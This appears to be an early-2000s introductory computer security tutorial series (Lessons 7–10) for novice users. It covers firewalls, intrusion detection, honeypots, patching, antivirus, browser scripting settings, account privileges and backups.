In a network or computer security sense the model is flipped around somewhat. Rather than a system designed to contain the damage or keep it centralized to a single room (or your network in this case), the purpose of a firewall is to construct a perimeter wall to keep all of the damage out of your room (or network).
A well designed and configured firewall is like having a single point of entry into your building with a security guard at the door allowing only authorized personnel into the building. The firewall will block or allow traffic into your network or computer based on the rules you give it.
Obviously, if you have a twenty foot high brick wall with barbed wire on the top and armed guards monitoring the gate, but there are holes in the wall and tunnels under the wall you won’t be very secure. The simplest way to ensure your firewall is secure is to block everything by default and only authorize the traffic you want to allow in.
There are various techniques or ways of accomplishing this goal. Each has its pros and cons. One may be superior at effectively blocking traffic, but at the expense of impacting the speed and performance of the network or the system it is running on.
The first primary distinction between types of firewalls is hardware vs. software. The naming is misleading because a “hardware” firewall is just a software firewall running on a dedicated piece of hardware or specialized device. At its core, a hardware firewall is still running some sort of operating system on which a software firewall is blocking and authorizing network traffic.
That said, “hardware” firewalls often provide better protection. For starters, if a vulnerability is found for that type of firewall hopefully an attacker exploiting it would only gain access to the firewall device itself. If you are running a firewall application on a domain controller or a web server and the firewall gets compromised the attacker also gains immediate entry to these important systems.
Another consideration is the impact to system performance. Depending on the amount of network traffic coming into your system it can use a great deal of processing power and system resources to assess the various packets and either block or allow them. By running a firewall on a system that has other purposes the resources will have to be shared and the application, the firewall or both will suffer from a lack of resources.
Many cable or DSL routers designed for home use come with a limited built-in firewall. These firewalls tend to be basic packet-filtering devices that simply allow or deny traffic on particular ports depending on how you configure it.
Ports are like channels for your network traffic. Just like you might have to tune your television to channel 35 to watch your favorite TV show or set your radio to a particular frequency to get the music you like to hear, you must also listen or receive traffic on certain channels, or ports, for different types of Internet and World Wide Web traffic.
The default port for web traffic is TCP port 80. In order to access most web sites your computer must initiate a connection on port 80. In this case the initial request for port 80 traffic is coming from your computer. However, unless you are hosting a web site on your computer there is no reason for any external device to try and connect to your computer on port 80. So, you can safely block all incoming port 80 traffic without affecting your ability to surf the Web.
Using this same example, you can essentially block ALL incoming traffic. If your computer is not acting as a file server, FTP server, web server or providing any other service to external computers then there is no reason for any external computer to try and establish a connection with your computer. Just as was illustrated above, you can block all incoming ports without affecting your ability to communicate out on those same ports.
There are two problems with this type of firewall though. First, many only block on the well-known ports which are ports 0 – 1023. There are about 64,000 other possible ports that wouldn’t be blocked. If you have 65,000 doors into your house and only lock 1000 of them you probably aren’t very safe. The other problem is that this solution only blocks inbound connections. You also want to monitor and block programs from the inside from trying to communicate with services or on ports that you haven’t authorized.
For this reason it is advisable to use personal firewall software (see Top Software Firewall Products) on the computer as well. The router firewall will block most “normal” incoming connections. Should some traffic get past the firewall or if your system gets infected with a worm or Trojan horse and tries to interact with the system and establish outbound connections your software firewall will detect this activity and alert you.
There are various techniques or methods employed by firewalls. Some, like mentioned above on your basic cable / DSL router use simple port blocking or packet filtering. This method can be vulnerable to some exploits which would let an attacker use IP spoofing or other tricks to sneak past the firewall. Other methods like stateful inspection, circuit-level gateways and application gateways provide better security but at the cost of some speed and performance. To learn more about the various methods read What Is A Firewall?.
Another perimeter defense that you can employ is an Intrusion Detection System, or IDS. An IDS is not designed to block any traffic per se. An IDS is a device or application used to inspect all network traffic and alert the user or administrator when there has been unauthorized attempts or access. Depending on the device or application used, the IDS can either simply alert the user or administrator or it could be set up to block specific traffic or automatically respond in some way.
The two primary methods of monitoring are signature-based and anomaly-based. Signature-based detection relies on comparison of traffic to a database containing signatures of known attack methods. As new vulnerabilities and exploits are discovered you must update the IDS to recognize new attacks.
Anomaly-based detection compares current network traffic to a known-good baseline to look for anything out of the ordinary. Using anomaly-based detection an IDS can theoretically detect attacks that are not yet known and for which no signature yet exists. Both methods have their drawbacks and many IDS systems use a hybrid of the two methods.
The IDS can be placed strategically on the network as a NIDS (network-based intrusion detection) which will inspect all incoming network traffic or it can be installed on each individual system as a HIDS (host-based intrusion detection) which inspects traffic to and from that specific device only.
You may have heard the phrase “You’ll catch more flies with honey than with vinegar.” Well, this logic has been applied to network security as well. SearchSecurity.com defines a honeypot as “a computer system on the Internet that is expressly set up to attract and “trap” people who attempt to penetrate other people’s computer systems.”
This definition is workable but misses the mark in my opinion. One use of a honeypot is to lure would-be attackers away from their true target by offering a target that seems more enticing. In effect, the honeypot acts as a decoy so that the real targets go unnoticed. Often the honeypot does not yield information allowing you to identify or “trap” the attacker. The value of the honeypot lies in the information that is collected which help you to identify how and when the attackers entered the system. Using this information an administrator can learn what new techniques are being used by attackers and use it to harden and protect their real systems.
It is still important to protect individual systems with antivirus software and keep the operating systems and applications patched and updated, but running perimeter defense systems like the ones we discussed in this lesson provide an extra layer of defense. The firewall can help you to restrict or block the flow of unwanted network traffic. The IDS can monitor network traffic and alert you when an attack is in progress. And, the honeypot can be used as a decoy or to gather reconnaissance information on new hacker techniques. Each of these plays a slightly different role and can be used alone or in combination to secure your network perimeter.
With Lesson 8 we begin to enter the home stretch in the 10-part Computer Security 101 Series. The object of Computer Security 101 is to provide an introduction for new or novice users to the technology, terminology and acronyms commonly used with computers and networks. Understanding these things better will hopefully help people understand what, how and why they need to secure their computers as well.
Lesson 7 was dedicated to hardware and software based firewalls. With Lesson 8 we will begin discussing preventive and proactive measures users can or should take to protect themselves from hacking, viruses and other malicious threats.
According to one security research firm there have been 28 vulnerabilities identified for the Windows XP Home operating system between January 1, 2003 and June 30, 2003. For Windows 2000 during that same time frame there were 32 vulnerabilities identified. Depending on the version of Linux you might be running there were up to 14 vulnerabilities identified.
The vulnerabilities mentioned above apply only to the operating system itself too. The Internet Explorer web browsing software had 20 vulnerabilities identified during the period from January 1, 2003 to June 30, 2003. There was 1 vulnerability identified for the Adobe Acrobat Reader software and 18 vulnerabilities identified for the popular Apache web server program.
The point of all of this is that if you haven’t been paying attention and applying patches as they become available for your system and applications you could be vulnerable to more attacks and exploits than you’d care to count.
Not all of these vulnerabilities are created equally. Many, if not most, are minor annoyances. The set of conditions necessary to actually exploit the vulnerability can be so specific and / or the potential damage from the vulnerability may be so minor that its hardly worth taking notice. But, every once in awhile a vulnerability comes along that, if properly exploited, can lead to the complete and total compromise of your computer system.
That means the attacker could potentially read, copy or delete any file on your system- personal information, financial information, family photos. They could also secretly place backdoors to allow them to continue getting into your system even if you do patch the vulnerability after the fact. Your system could have software installed that will allow the attacker to use your computer to initiate attacks on other computers.
Sometimes the exploitation of these vulnerabilities can be automated through a virus or worm. Most of the viruses and worms that have had significant impact on the Internet in the past few years actually took advantage of known vulnerabilities for which patches had been available for months.
Earlier this year the SQL Slammer worm generated so much traffic that it essentially brought the Internet to its knees for a weekend- the routers and servers that direct the flow of traffic could not handle the volume. SQL Slammer exploited a flaw in Microsoft’s SQL Server software for which a patch had been made available over 6 months prior. Unfortunately a good percentage of the SQL Servers in the world had not been patched. If they had SQL Slammer might have fizzled out and nobody would have even noticed it.
Why should you care? Many people believe they have no files or information of significant value or confidentiality on their PC’s so they have no reason to care if their computer gets hacked. As mentioned above though, leaving your system vulnerable could allow an attacker to hijack it and use it to attack other computers. It could also mean that your machine could end up propagating the next big virus or worm and infecting hundreds or thousands of other computers. As a member of the Internet-user community you have a responsibility (see False Sense of Security) to do what you can to keep the community secure even if you don’t care about protecting yourself.
Depending on the operating system or application vendor, keeping up to date with patching can be quite simple. Many vendors have mailing lists you can join to automatically receive an email when there are new vulnerabilities discovered or patches released. You can also join 3rd-party mailing lists for your specific operating system or application, or even a mailing list that discusses vulnerabilities in general. One of the most well know sources for such lists is Bugtraq.
For the Microsoft Windows platform you can use the Automatic Update feature. It allows you to control when and how the updates are retrieved and installed. Using a feature like this can keep you current with patching with a minimum of effort on your part.
The Windows Automatic Update only pushes out critical updates though. You should still periodically run a scan using something like Microsoft Baseline Security Analyzer (MBSA)- a free tool available from Microsoft. MBSA will scan your system and let you know not only what patches you may be missing, but also other security issues like accounts with no passwords or having the Guest account enabled.
You can also go to the Windows Update web site. The site will perform a scan of your system and let you know what patches or updates you are missing. They are divided into three categories: Critical Updates & Service Packs, Windows XP and Driver Updates- so you can narrow down which ones may be important to you.
Even if your system is properly patched, running antivirus software that is updated and current and sitting behind a firewall, it is also a good practice to shut your system down when its not in use.
This advice is particularly useful for those with broadband connections such as cable modems and DSL connections. Users who dial up are generally less susceptible to attacks for two reasons: the 56k connection is too slow for hackers to work effectively and dial-up users only stay connected long enough to do what they need to do and then they disconnect from the Internet.
Users of broadband are generally connected to the Internet 24 hours a day, 7 days a week with connection speeds significantly faster than dial-up connections. No matter how well you patch and protect your system a hacker may find a way in given an unlimited amount of time like that. Most home users don’t implement or check security logs (see Plan Ahead to Catch an Intruder) and would have virtually no way of knowing what their computer was doing at 3am.
Patches and virus updates take time as well. Even if you are diligent about keeping up with these changes you may still be vulnerable for hours or even days before the vendor releases a patch or your antivirus software vendor puts out the update to detect the new threat. Obviously, you are vulnerable to this even while using the computer, but the point is that you gain nothing by leaving the computer running and connected to the Internet waiting to be victimized longer than necessary.
The final word of advice for this lesson is that you should not run programs you don’t know about. This is primarily related to email attachments, but can apply just about anywhere. It is mind-boggling how many people will receive an email claiming to be from Microsoft support with a pornographic message body written in broken English and still execute the attached file- as if Microsoft would send you an unsolicited joke or picture.
For the record, even when Microsoft support does send an alert or communication they never include file attachments. They only include links back to the Microsoft web site where you can download the file at your leisure. Not only would sending an executable file attachment cause problems in and of itself, but it would be very taxing on the Internet servers and routers if Microsoft sent an actual file attachment to all registered customers every time their was a new patch or vulnerability. The same is true for most other operating system and application vendors for the same reasons.
If you have even the slightest apprehension or suspicion about a file- don’t open it. Its not worth infecting your system or unknowingly installing a Trojan on your system just to satisfy your curiosity to see if the attached joke really IS the funniest thing ever.
If you receive an email attachment or find some mysterious file on your computer and you just have a burning desire to open it and find out what it really is or does you should at the very least scan it for viruses. Make sure you are running the most current update of your antivirus software first and scan the file before executing it. You may also want to shut down your Internet connection first to prevent any virus or worm from propagating in the event that you do in fact become infected.
That does it for Lesson 8. To recap, the preventive and proactive steps that you can take to protect yourself and others are:
• Keep up with vulnerabilities on your operating system and applications and apply patches as they become available.
• Turn off your computer or disconnect from the Internet when you will not be using it for an extended amount of time- like overnight.
• Do not execute any file that you don’t recognize or have any suspicion or apprehension about what it might do. If you must open the file, scan it for viruses first.
The first 7 lessons of the Computer Security 101 series discussed various technologies and terminology associated with using computers and being on the Internet and what some of the major pitfalls are. The goal is that hopefully by knowing a DNS from a DHCP from a DoS you can better understand the nature of new threats when you hear about them and what you should do to protect your computer or network.
This lesson will pick up where Lesson 8 left off- talking about the different steps you can take to try and make your Internet experience safer and protect yourself from hackers and malicious code. Lesson 8 covered vulnerability patching, shutting down your system when not in use and making sure you know what a program is before you execute it.
These probably should have been in Lesson 8, but we’ll start Lesson 9 with two of the most important preventive measures- run a current antivirus software program and a current personal firewall program at all times.
Antivirus software blocks known viruses, worms, Trojans and other malicious code by comparing it with signatures of known malware. Most antivirus software also has the ability to perform heuristic scanning which uses known signs or patterns of malware to try and detect viruses or worms that aren’t yet known and for which your software doesn’t have a signature to match it against.
There are generally three components to antivirus software. One monitors incoming email and email file attachments. One monitors incoming Internet traffic and file downloads. The third one scans your entire computer in the background while you work. If you find a suspicious file you can choose to scan that file manually.
Instead of trying to guess if that message from firstname.lastname@example.org with the MPG file attachment is legitimate or not, your antivirus software should immediately flag any known viruses or other malicious code and alert you. You can usually configure how you want virus detections handled- automatic quarantine of the file, automatic deletion of the file or you can have the antivirus software ask you at each detection how you want to handle it.
If you don’t want to spend money to buy an antivirus program you can check out free antivirus applications at Free Antivirus and Virus Removal Software.
A personal firewall software application monitors all incoming and outgoing network traffic and blocks unauthorized packets from getting through. Different programs may use different methods (packet filtering, circuit-level gateway, stateful inspection, etc. – for more information see What Is A Firewall?) to filter and block unauthorized traffic.
Using a firewall is like having your house completely locked up except for one entrance and that one entrance has an armed security guard- the firewall. Not using a firewall is like leaving your door open and your windows unlocked and hoping nobody sneaks into your house when you’re not looking.
Setting up and using a firewall program properly to secure your computer can be tricky so you need to make sure you pick one that you are comfortable with and then familiarize yourself with the interface and controls. Simply installing a firewall program will not help you if you then set it up to allow all incoming traffic. It would be like that security guard at your house falling asleep and letting intruders come and go as they please.
Products such as ZoneAlarm (free for personal use- see Free Personal Firewall Software) not only block incoming packets and ports as you specify, but also monitor the interaction of programs on your computer with the operating system and its services. Watching for suspicious activity and anomalous outbound traffic is helpful to detect when your computer has been hacked or infected by a Trojan or some other malicious code which is trying to establish an outbound connection or perform functions on your system that shouldn’t be allowed.
Most antivirus vendors release regularly scheduled updates to the virus definitions for their software on a weekly basis. If there is a new threat that is spreading rapidly or is unusually destructive they will sometimes release an update mid-week. But, the bottom line is that even if you diligently update your virus definitions weekly, there are still 7 days where you are potentially vulnerable to any new threats.
Even if you update daily there may be a span of a few hours between the initial discovery of a new threat and the release of new virus definitions by your antivirus software vendor to detect that threat. To protect yourself during these vulnerable periods and from malicious activity in general you can take other preventive actions.
For starters- disable hidden file extensions in Windows. Many viruses rely on a common Windows “feature” to help trick the user into unwittingly executing an infected file attachment. By default Windows hides the file extension for certain file types. Rather than showing “myfile.exe” you will only see “myfile” when viewing a folder or on an email attachment. If a virus comes in as a file attachment called “coolpic.jpg.exe” Windows will drop the EXE and you will see “coolpic.jpg” which may trick you into believing the file is simply a picture or graphic image rather than an executable file.
There doesn’t seem to be any particular use per se for this feature. It seems its sole reason for existence is to make the computing experience “easier” for the Windows audience by not cluttering the screen with “techie” terms like EXE or VBS. Since you gain nothing by hiding the file extensions it makes sense to disable this feature so you don’t fall prey to having it used against you.
To change the default setting you should open Windows Explorer. At the top of the Windows Explorer window you need to click on Tools –> Folder Options (Folder Options may be listed under View in older versions of Windows). Click on the View tab and then uncheck the box labeled “hide extensions for known file types” and click OK at the bottom.
Another security precaution you should take is to disable active scripting. This relates primarily to the Windows environment, but you can check the configuration of web browsing software on other platforms as well.
Active scripting allows web pages and HTML based documents and email to run scripts and applets that execute programs. This can be used to generate dynamic content rather than simply displaying a static page and can provide you with a richer web-surfing experience.
There are many useful benefits to active scripting- both productive and some just for pure entertainment. However, allowing active scripting to run unchecked gives cyberpunks an open license to execute malicious code on your system. It may be an applet that executes when you visit a web site or a script that runs when you open an HTML-based email message. Either way it can be used to install a virus or Trojan or any other malicious code that the attacker chooses.
Because some web sites aren’t even functional without active scripting you don’t want to necessarily disable it altogether. You do want to control which sites can execute it and which can’t though. Internet Explorer uses Security Zones to assign different privileges to different web sites. You can configure settings for Trusted, Internet, Intranet and Restricted Sites (see How to Configure IE Security). Once you have the zones configured like you want them you can add web sites to the zones as needed- adding sites that you trust and that may require active scripting to run to your Trusted Sites zone.
For the Restricted and Internet Security Zones you should disable active scripting. Most sites that you visit on the web will fall under the Internet Security Zone unless you move them to Trusted or Restricted. See How To Disable Active Scripting in Internet Explorer for more information on the specific steps involved.
Email programs like Outlook and Outlook Express allow you to configure what Security Zone HTML-based emails should be opened in. In Outlook XP you can click on Tools –> Options and then select the Security tab. Under Secure Content select the Security Zone that you wish HTML emails to run in and then select OK to close the box.
Of course you can always resort to alternative products that may be more secure or lack some of the flaws inherent with their Microsoft counterparts. There are plenty of alternative email programs and popular web browsers like Netscape and Opera. Whatever you choose just make sure you familiarize yourself with the security features and configure it properly to protect yourself.
As always you should also ensure that you stay up to date on security issues with your applications- like Internet Explorer or Outlook Express- and apply any necessary patches or security updates to protect yourself from known vulnerabilities.
That does it for Lesson 9. We covered the use of antivirus software and personal firewall software as well as exposing hidden file extensions and controlling how and when active scripts are allowed to run on your system. One lesson to go and your Computer Security 101 education will be complete!
Welcome to Lesson 10- the final lesson in the Computer Security 101 series. If you have followed the series through the previous nine lessons you should now know a little more about many aspects of computer networking, the pitfalls of being on a network and on the Internet and some steps you can take to protect yourself.
The purpose of the Computer Security 101 series is to provide you with an understanding of the core technology, terminology and acronyms that are used to network computers and connect to the Internet. Over the course of the first nine lessons we covered DNS, IP addresses, TCPIP, ports, protocols, viruses, malicious code, antivirus software, firewalls and many other things.
Lesson 8 and Lesson 9 both focused on proactive steps you can take to protect yourself and make your Web surfing experience safe and enjoyable. We covered preventive measures such as keeping your operating system and applications patched against known vulnerabilities, not running unknown programs, and installing and running up to date antivirus and personal firewall software to name just a few.
In our final lesson we will cover a few more precautionary measures you can take. For starters, you should not log in with root or administrative privileges unless it is necessary. Many viruses and hacking attempts exploit vulnerabilities that allow the attacker to run code with the same privileges as the currently logged in user. Being logged in with root or administrative privileges could give away the keys to the vault.
Many users typically prefer to be logged in with administrative privileges so they can install programs and make system configuration changes that regular users may not be allowed to do. However, *Nix (Linux and Unix) systems allow users to execute commands as SU (superuser) and Windows 2000 and XP allow users to execute programs using “Run As”.
Both of these features allow users to perform administrative functions while logged in as regular users. For some added authority without being logged in as an administrator, Windows systems also allow users to be assigned as PowerUsers which grants them more permissions than a normal user without giving them complete administrative access.
On a similar note, after you have taken care of not being logged in as administrator you should ensure that only administrators have access to certain features, files and folders. Folders which contain files that are system critical, such as the Windows and Windows System32 folders should be restricted to read-only for users other than administrators. It doesn’t do much good to log in as a regular user if a regular user can access and modify all of the same files the administrator can.
For more information on how to set, view, change or remove permissions on files and folders in Windows you can refer to this Microsoft Knowledgebase Article. The article outlines steps you can use to check or validate the effective permissions on an object so you can tell who has what level of access given the current configuration.
The method for accomplishing this in *Nix may vary from vendor to vendor, but commands such as “chgrp” (change the group ownership of a file), “chmod” (change the permissions mode of a file) and “chown” (change the owner of a file or directory) can be used to modify things the way you want them.
Another trick you can use is to rename the Administrator account. Again, viruses and hackers tend to target the Administrator account or accounts with administrative privileges because they provide the broadest access. If you rename the Administrator account to something else you can make it at least a little bit harder for an attacker to find it. You can follow these step-by-step tutorials for changing the name of the Administrator account from Auburn University:
• Rename Administrator on Windows NT/2000
• Rename Administrator on Windows XP
Because a hacker knows that there should be an Administrator account, you should also create a replacement account called “Administrator” and give it very limited privileges like a regular user. When a hacker comes searching they will find the Administrator account they covet and if they succeed in hacking into it they will not have gained the omnipotent authority over your files and folders they thought they would get.
Admittedly this trick is by no means foolproof. The fact of the matter is that each user account created in Windows has a unique SID (Security ID). Part of the SID is the RID. By default, the Administrator account has a RID of 500 and the Guest account has a RID of 501 (Wayne’s NT Resources For Administrators and Users- Tip 41). Experienced hackers know how to decipher the SID and can tell based on the SID whether the account is the true Administrator or not. There are also script-kiddy hacker tools that will automate this process for less-experienced hackers.
However, that is not a reason in and of itself not to do it. Locking your car door won’t keep professional auto thieves from taking it, but it will keep the general population from taking stuff from your car. The same logic applies here. You won’t trick everybody or keep everyone out of the Administrator account, but the more difficult you make it for the general population the better off you are.
You can also rename the Guest account, but with the same caveats as above. Because it has a default RID the real account is easily identifiable by viewing the SID’s for each user account. Whether or not you choose to change the name on the Guest account, you should assign the Guest account a strong password to prevent unauthorized users from accessing your computer using this account.
The Guest account is disabled by default, but also has a blank password by default. It is possible for hackers and malicious code to sometimes enable the Guest account after they have compromised your machine through other methods. If they have managed to gain administrative privileges they can also add the Guest account to the Administrators group to grant it elevated permissions as well. With no password assigned an enabled Guest account will grant essentially anyone access.
To add a layer of protection you should assign a strong password to the Guest account- something of 7 or more characters, preferably containing a variety of upper and lower case letters, numbers and special characters (for example the % or & symbols). You should not use your name, your dog’s name, your child’s birthdate or any other easily attainable information. In fact, the less “sense” it makes the harder it will be for anyone to guess. For more information about password security see the article Password Security. Even with a strong password in place, you should leave the Guest account disabled unless you have a specific reason to enable it.
No matter how well you maintain your system- defragging the hard drive, deleting temporary files, etc; and no matter how well you protect your system- antivirus software, firewall, etc.- it may one day simply crash. Either through physical mechanical defect or through a virus or hacker deleting or compromising data you could lose everything you have on your hard drive.
For many people this would include a lot of personal information. In this age of digital photography losing your hard drive can be the equivalent of losing all of your photo albums in a house fire or flood. You might have important documents, financial data, catalogs of audio files and other important and impossible, or at least difficult, to duplicate data.
For these reasons it is very important that you back up your data on a regular basis. The frequency you choose to back up can vary depending on the frequency your data changes. If you only add new important documents every 6 months or so, or you only update your financial data once a month, it probably isn’t necessary to perform a backup every week. You should choose a frequency that works for you and set some sort of reminder for yourself to make sure it gets done. You should also do a backup immediately after adding any critical or sensitive data.
Your backup could be burning your digital photos to CD or DVD directly. If you have a spare hard drive or an external hard drive you could simply copy the whole thing or copy files and folders directly. In most cases you are probably better off using an actual backup utility. There are tons of freeware, shareware and commercial products available to help you perform backups. These utilities generally compress data so you can back up more information in less space. Windows comes with a backup utility built-in. Some 3rd-party utilities may offer more flexibility or have product features that will make the backup process faster or easier so they may be worth looking into.
The last point about backups is that you should also store a copy in another location. If your house burns down and your computer becomes a melted blob of plastic and silicon, so will your backup media. To gain the full benefit of having the backup data you should store it somewhere else so that in the event of a complete catastrophe you can restore your data instead of losing everything all at once.
The last word of advice for Lesson 10 is to create a boot disk. Again- whether through some physical or electrical glitch or as the result of some malicious virus or worm- you may lose the ability to get into your operating system. Windows offers the ability to boot into SafeMode which loads the bare minimum operating system- no programs or drivers that aren’t necessary. This might help you at least get into the system so you can work with it. Windows 2000 and XP also offer a Recovery Console which contains access to some tools and utilities you can use to try and restore your operating system to operational status.
Windows 98/Me offers a simple way to create a boot disk from the Control Panel. If you go to Add / Remove Programs and select Startup Disk it will create a bootable floppy disk which contains useful DOS utilities such as FDisk and Format. It also contains CD drivers so that you can access your CDROM drive after booting from the startup floppy as well.
The Windows 98 boot floppy will work to boot a Windows 2000 or XP system as well, but it does not have the ability to read or access NTFS drives- only FAT and FAT32. For security reasons most people use NTFS as their file system on Windows 2000 and XP. You can use a utility like the one available at NTFS.com to automatically create an NTFS-friendly boot disk, or you can follow the instructions available at ComUSolv.com to create a bootable startup floppy disk for Windows 9x/Me, NT, 2000 or XP. There are also instructions available on Microsoft’s site to help you out.
That does it. The Computer Security 101 series is now complete. Watch for more advanced lessons and lessons on more specific topics- intrusion detection, cryptography, etc.- in the future. Be sure to take the quizzes for each of the 10 lessons to see how much you’ve learned. For a true test of your Computer Security 101 knowledge watch for the Final Exam to be posted soon.